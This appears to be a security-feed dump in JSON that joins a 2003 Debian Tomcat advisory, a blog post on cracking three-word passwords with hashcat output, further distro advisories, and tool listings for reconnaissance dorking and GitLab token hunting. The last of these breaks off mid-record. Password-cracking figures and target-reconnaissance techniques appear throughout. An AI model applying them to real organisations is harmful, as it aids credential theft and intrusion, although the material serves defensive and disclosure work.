Aldrin Martoq has discovered a denial of service (DoS) vulnerability in
Apache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP
connector makes Tomcat reject further requests on this port until it is
restarted.

For the current stable distribution (woody) this problem has been fixed
in version 4.0.3-3woody3.

For the unstable distribution (sid) this problem does not exist in the
current version 4.1.24-2.

We recommend that you upgrade your tomcat4 packages and restart the
tomcat server.

Upgrade Instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

These files will probably be moved into the stable distribution on
its next revision.

For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-395-1:39A75", "bulletinFamily": "unix", "title": "[SECURITY] [DSA 395-1] New tomcat4 packages fix denial of service", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 395-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 15th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : tomcat4\nVulnerability : incorrect input handling\nProblem-Type : remote\nDebian-specific: no\n\nAldrin Martoq has discovered a denial of service (DoS) vulnerability in\nApache Tomcat 4.0.x. Sending several non-HTTP requests to Tomcat's HTTP\nconnector makes Tomcat reject further requests on this port until it is\nrestarted.\n\nFor the current stable distribution (woody) this problem has been fixed\nin version 4.0.3-3woody3.\n\nFor the unstable distribution (sid) this problem does not exist in the\ncurrent version 4.1.24-2.\n\nWe recommend that you upgrade your tomcat4 packages and restart the\ntomcat server.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3.dsc\n Size/MD5 checksum: 708 64c5aa3e586635edcd2678d10ab809d2\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3.diff.gz\n Size/MD5 checksum: 16223 bafcad535ede73b939b31e32be50ca9b\n 
http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3.orig.tar.gz\n Size/MD5 checksum: 1588186 2b2e0d859f7152e5225633933e6585d6\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/contrib/t/tomcat4/libtomcat4-java_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 1134260 e667be7a8c67c26834069f15dd93f616\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4-webapps_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 1164474 9b3283713a2de35d7647f4b9e9820c99\n http://security.debian.org/pool/updates/contrib/t/tomcat4/tomcat4_4.0.3-3woody3_all.deb\n Size/MD5 checksum: 126724 39150e4598d20ed52d49a470d2d8ce7b\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "published": "2003-10-15T00:00:00", "modified": "2003-10-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00203.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2018-10-16T22:13:38", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-10-16T22:13:38", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "pentestit", "idList": ["PENTESTIT:4724A04D183972A5F54CF1B5ECE50CD7"]}, {"type": "kitploit", "idList": ["KITPLOIT:5624592253315055918", "KITPLOIT:1882022258915021920", "KITPLOIT:6136053922090931746"]}, {"type": "mssecure", "idList": ["MSSECURE:AC5FF665FC7D44097EDE2A1D4E9171CF"]}, {"type": "threatpost", "idList": 
["THREATPOST:9CC427FD799628736019D1DA0818374B", "THREATPOST:A7995232CE91305C94B84BB400B1EA34"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0786-1", "OPENSUSE-SU-2020:0780-1", "OPENSUSE-SU-2020:0785-1", "OPENSUSE-SU-2020:0784-1", "OPENSUSE-SU-2020:0778-1", "OPENSUSE-SU-2020:0779-1", "OPENSUSE-SU-2020:0781-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2239-1:56917", "DEBIAN:DLA-2238-1:3B63E"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:1AD336AC246CB047F3348DC0B00B2A92"]}, {"type": "thn", "idList": ["THN:53CE09A565F7207DDD05DFEDE00CDEC6"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157980"]}], "modified": "2018-10-16T22:13:38", "rev": 2}, "vulnersScore": 0.5}, "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "arch": "all", "operator": "lt", "packageFilename": "tomcat4_4.0.3-3woody3_all.deb", "packageName": "tomcat4", "packageVersion": "4.0.3-3woody3"}]}
{"pentestpartners": [{"lastseen": "2021-01-19T08:26:24", "bulletinFamily": "blog", "cvelist": [], "description": "### \n\n### Introduction\n\nThe National Cyber Security Centre (NCSC) have advocated the use of three random words for several years to create strong passwords, and that advice has been repeated recently by the National Crime Agency, and multiple police forces in the UK\u2026. but just how strong are these passwords?\n\nBefore we go there, we should acknowledge that most people have one or two weak passwords that they use on multiple sites & systems. One of those is breached, which results in other accounts being compromised through password stuffing. The NCSC advice is good in comparison to that low bar.\n\nBut we were surprised to see that password managers weren\u2019t in the top 5 actions from NCSC. Here\u2019s why they are so important:\n\n### The numbers\n\nThe English language has a huge number of words \u2013 the online [Oxford English Dictionary](<https://www.oed.com/>) has over 600,000 words however only around 171,000 are in current use. If we chose three random words from the words in current use, we\u2019d have a search space of around 5,000 trillion. Yes, that is a lot, but modern GPUs are fast\u2026 really fast. One of our dedicated password crackers can search about 20 billion passwords every second from a disk-based wordlist (hashcat benchmark is about 185 GH/s). At that speed we could crack a three-word password in around 4 days.\n\nThe problem with this advice is that no one knows 171,000 words. Estimates for the number of words that a university-educated person knows is around 40,000 words, so we created a dictionary with the 66,000 most commonly-used words hoping that would cover most of the words that most people would tend to choose, and this reduced our search space by about 17 times allowing us to search all likely three word passwords in only 6 hours! 
Hmmm, it\u2019s not looking good for ThreeRandomWords\u2026\n\n### Official recommendation\n\n\n\n##### **Source: **<https://www.ncsc.gov.uk/cyberaware/home>\n\n \n\nWe took an interest in the example password of \u201cRedPantsTree\u201d given on the NCSC site. All of these words are easily in the top 30,000 most common words, but we decided to attack it with our big dictionary to simulate a more realistic attack time. We also added in the NTLM hash for \u201cSuperfluousExonerateSerendipity\u201d to show that even choosing less commonly thought of words is still an issue.\n\nThe NCSC password was cracked in about 4 hours, with the whole search space, including our uncommon three-word password, completed in around 6.5 hours.\n \n \n MMMSession..........: papa_WWW\n Status...........: Running\n Hash.Name........: NTLM\n Hash.Target......: /home/papa/threerandomwords.ntlm\n Time.Started.....: Wed Jan\u00a0 6 12:28:06 2021 (4 hours, 8 mins)\n Time.Estimated...: Wed Jan\u00a0 6 19:15:33 2021 (2 hours, 38 mins)\n Guess.Base.......: File (/opt/dictionaries/papa/english-66k-upperupper.txt), Left Side\n Guess.Mod........: File (/opt/dictionaries/papa/english-66k-upper.txt), Right Side\n Recovered........: 0/3 (0.00%) Digests\n Progress.........: 272600599101440/427621521183219 (63.75%)\n Rejected.........: 0/272600599101440 (0.00%)\n Restore.Point....: 3616604160/5675964921 (63.72%)\n Candidates.#1....: OwainLawyersAugury -> OwenSuckedAvertir\n Candidates.#2....: OviedoClaudianLatex -> OwainLawyerLeahy\n Candidates.#3....: OverysselSightedPreviously -> OviedoClaudiaProclamations\n Candidates.#4....: OverworkInterrogationsWiry -> OverysselSightWo\n \n **de947fd0bbd9f4f5c65a5d802cae1597:RedPantsTree**\n **.**\n **.**\n **f654100d842b2f6f68efeddcec2973bb:SuperfluousExonerateSerendipity**\n\n### CorrectHorseBatteryStaple\n\n\n\n##### **Source:** <https://xkcd.com/936/>\n\n \n\nWhat about using four words\u2026 does that work? 
Well, it does make things more difficult, but again it depends on how commonly used the words are, and how big the attackers dictionary is. The first three words of the xkcd example are really common and appear in the top 5,000 of every frequency list that I\u2019ve seen. Staple is less common and is usually in position 18,000 to 20,000. So to actually crack that specific four word password encoded as an NTLM hash, would take about 5 months on one of our password cracking servers.\n\n### Cracking characteristics\n\nAlthough it only takes about 6 hours to run through all of the three-word passwords, that is exclusively for words with an uppercase first character. If we want to crack all lowercase, that would be an extra 6 hours, add a \u201c1\u201d or a \u201c!\u201d at the end, and that\u2019s an extra 6 hours. So, if an attacker compromised your Windows domain and everyone was using NCSC recommendations would it take forever to crack? Well, counterintuitively, it takes the same amount of time to crack 1,000 passwords as it takes to crack just 1, so if your NTLM hashes are compromised, within a couple of days, an attacker would have compromised most of your passwords. With the NCSC advice to also not expire passwords, cracking even a four-word password in 5 months could still be an issue.\n\n### What to do?\n\nAt Pen Test Partners, out IT team install a password manager by default on all managed devices. A password manager creates randomly-generated passwords that are super strong, and encrypts them for secure storage. I have no idea what 99% of my passwords are \u2013 they are all stored in my password manager, and it really doesn\u2019t matter that I don\u2019t know what they are. The password manager logs me into any system I need, quicker than I could type amonie and Password1!\n\nFor more sensitive systems, and anything that\u2019s internet-facing, we also advise the use of Two-Factor Authentication (2FA). 
That means that even if your password is compromised, an attacker still can\u2019t log in without your secondary authentication.\n\nIf you manage a Windows domain, we also recommend doing regular password audits. Our [password auditing tool, Papa](<https://www.pentestpartners.com/penetration-testing-services/papa/>), now checks for three random word passwords in various formats and we spend several days of cracking time now, just on the three-word passwords.\n\nThe post [Security Blog](<https://www.pentestpartners.com/security-blog/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "modified": "2021-01-19T06:00:04", "published": "2021-01-19T06:00:04", "id": "PENTESTPARTNERS:943CE476724D136E53A4D3E7882695D1", "href": "https://www.pentestpartners.com/security-blog/three-word-passwords/", "type": "pentestpartners", "title": "Three Word Passwords", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2021-01-19T06:33:09", "bulletinFamily": "unix", "cvelist": [], "description": "flatpak is a system for building, distributing and running sandboxed desktop applications on Linux. See https://wiki.gnome.org/Projects/SandboxedApps for more information. 
", "modified": "2021-01-19T01:52:27", "published": "2021-01-19T01:52:27", "id": "FEDORA:B6BE0309FF1D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: flatpak-1.8.5-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-01-19T01:18:34", "bulletinFamily": "unix", "cvelist": [], "description": "- -----------------------------------------------------------------------\nDebian LTS Advisory DLA-2528-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Utkarsh Gupta\nJanuary 19, 2021 https://wiki.debian.org/LTS\n- -----------------------------------------------------------------------\n\nPackage : gst-plugins-bad1.0\nVersion : 1.10.4-1+deb9u1\nCVE ID : not yet available\n\nAndrew Wesie discovered a buffer overflow in the H264 support of the\nGStreamer multimedia framework, which could potentially result in the\nexecution of arbitrary code.\n\nFor Debian 9 stretch, this problem has been fixed in version\n1.10.4-1+deb9u1.\n\nWe recommend that you upgrade your gst-plugins-bad1.0 packages.\n\nFor the detailed security status of gst-plugins-bad1.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gst-plugins-bad1.0\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 1, "modified": "2021-01-18T21:48:41", "published": "2021-01-18T21:48:41", "id": "DEBIAN:DLA-2528-1:13C36", "href": "https://lists.debian.org/debian-lts-announce/2021/debian-lts-announce-202101/msg00016.html", "title": "[SECURITY] [DLA 2528-1] gst-plugins-bad1.0 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-01-19T01:17:50", "bulletinFamily": "unix", "cvelist": [], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4833-1 
security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 18, 2021 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : gst-plugins-bad1.0\nCVE ID : not yet available\n\nAndrew Wesie discovered a buffer overflow in the H264 support of the\nGStreamer multimedia framework, which could potentially result in the\nexecution of arbitrary code.\n\nFor the stable distribution (buster), this problem has been fixed in\nversion 1.14.4-1deb10u1.\n\nWe recommend that you upgrade your gst-plugins-bad1.0 packages.\n\nFor the detailed security status of gst-plugins-bad1.0 please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/gst-plugins-bad1.0\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 1, "modified": "2021-01-18T21:31:30", "published": "2021-01-18T21:31:30", "id": "DEBIAN:DSA-4833-1:6E7A2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2021/msg00012.html", "title": "[SECURITY] [DSA 4833-1] gst-plugins-bad1.0 security update", "type": "debian", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2021-01-19T09:37:39", "bulletinFamily": "tools", "cvelist": ["CVE-2020-0646"], "description": "[  ](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. 
Reconnaissance is the most important step in any [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation. \n\nThis tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target. \n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n** Techniques ** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure. \n\n 2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources. \n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information. \n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. 
There are numerous [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related \n\n 5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens. \n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records. \n\n 7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying [ default credentials ](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources. \n\n 8. SQL Errors: SQL errors leaks sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection. \n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application. \n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files. \n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. 
They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX. \n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information. \n\n 13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make attackers life easier when targeting application using newly discovered exploits. \n\n 14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page. \n\n 15. Install/Setup Files: Such files allows an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit. \n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues. \n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\". \n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen. \n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response. \n\n 20. GitLab: Quickly look for sensitive information on the GitLab. \n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation. \n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack. \n\n 23. 
.HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration. \n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration. \n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork, \n\n 26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders. \n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure. \n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information. \n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow. \n\n 30. Find WordPress related exposure using Wayback Machine: Look for archieved WordPress files using WaybackMachine. \n\n 31. GitHub: Quickly look for sensitive information on the GitHub. \n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website. \n\n 33. Reddit: Information about the particular organisation on the Reddit platform. \n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation. \n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains. \n\n 36. .git Folder: Source code exposure. it's possible to download the entire repository content if accessible. \n\n 37. YouTube: Look for any recent news on Youtube. \n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures. \n\n 39. .SWF File (Google): Flash is dead. 
We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities. \n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities. \n\n 41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities. \n\n 42. Wayback Machine: Look for archived files to access old files. \n\n 43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation. \n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services. \n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru \n\n 46. s3 Buckets: Open s3 buckets. \n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code. \n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys. \n\n 49. Shodan: Search engine for Internet-connected devices \n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint. \n\n 51. API Endpoints: Find WSDL files. \n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes. \n\n 53. 
CT Logs: [ Certificate Transparency ](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation. \n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks. \n\n 55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research. \n\n \n** Screenshots ** \n\n\nSearch for plaintext passwords for a target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying if the URL contains extenstion of \".do\": \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n** How to use this tool? 
** \n\n\nStep1: Download the file from Release section: [ https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe ](<https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe> \"https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe\" )\n\nStep2: Run the EXE file \n\nStep3: Enter the target domain \n\nStep4: Click on different buttons in the tool to find information \n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead \n\n \n** Questions? ** \n\n\nTwitter: [ https://twitter.com/maniarviral ](<https://twitter.com/maniarviral> \"https://twitter.com/maniarviral\" ) \nLinkedIn: [ https://au.linkedin.com/in/viralmaniar ](<https://au.linkedin.com/in/viralmaniar> \"https://au.linkedin.com/in/viralmaniar\" )\n\n \n** Dorking operators across Google, DuckDuckGo, Yahoo and Bing ** \n\n\nTable obtained from: [ https://exposingtheinvisible.org/guides/google-dorking/ ](<https://exposingtheinvisible.org/guides/google-dorking/> \"https://exposingtheinvisible.org/guides/google-dorking/\" )\n\nHere is a table with possible dorks for various search engines. \n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. | \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. 
| \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. | \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. [ https://en.wikipedia.org/wiki/ISO_3166-1 ](<https://en.wikipedia.org/wiki/ISO_3166-1> \"https://en.wikipedia.org/wiki/ISO_3166-1\" ) | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. 
| \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n** Contribution **\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n** [ Download BigBountyRecon ](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" ) **\n", "edition": 1, "modified": "2021-01-18T20:30:02", "published": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", "title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-18T15:31:28", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-CQi2hv4nrPs/X_u6C2h_NnI/AAAAAAAAU_Q/o2IKYB4S5i81eV09osQvuALsOHQLYZzcwCNcBGAsYHQ/s800/gitlab_hacks.png>)\n\n \n\n\nCollect OSINT for [ GitLab groups ](<https://docs.gitlab.com/ee/user/group/> \"GitLab groups\" ) and [ members ](<https://docs.gitlab.com/ee/user/project/members/#share-project-with-group> \"members\" ) and search the group and group members' [ snippets ](<https://docs.gitlab.com/ee/user/snippets.html> \"snippets\" ) , [ issues ](<https://docs.gitlab.com/ee/user/project/issues/> \"issues\" ) , and [ issue discussions ](<https://docs.gitlab.com/ee/api/discussions.html#discussions-api> \"issue discussions\" ) for 
sensitive data that may be included in these assets. The information gathered is intended to complement and inform the use of additional tools such as [ TruffleHog ](<https://github.com/dxa4481/truffleHog> \"TruffleHog\" ) or [ GitRob ](<https://github.com/michenriksen/gitrob> \"GitRob\" ) , which search git commit history using a similar technique of regular expression matching. \n\n \n\n\n** How the tool works ** \n\n\nStart by providing a group ID for a specific group on GitLab. You can find the group ID underneath the group name in the GitLab UI. Token-Hunter will use the GitLab group ID to find all associated projects for that group and, optionally, the group members' personal projects. Configure the tool to look for sensitive data in assets related to the projects it finds. Token-Hunter uses the [ same set of ](<https://github.com/dxa4481/truffleHogRegexes> \"same set of\" ) [ regular expressions ](<https://www.kitploit.com/search/label/Regular%20Expressions> \"regular expressions\" ) as TruffleHog with a few additions for GitLab-specific tokens. Token-Hunter depends on these [ easily configurable regular expressions ](<https://gitlab.com/gitlab-com/gl-security/gl-redteam/token-hunter/blob/master/regexes.json> \"easily configurable regular expressions\" ) for [ accuracy ](<https://www.kitploit.com/search/label/Accuracy> \"accuracy\" ) and effectiveness. Currently, the tool supports GitLab snippets, issues, and issue discussions with plans for future expansion to other assets. The tool is intended to be very configurable to allow for efficient [ discovery ](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) of sensitive data in the assets you're specifically interested in. 
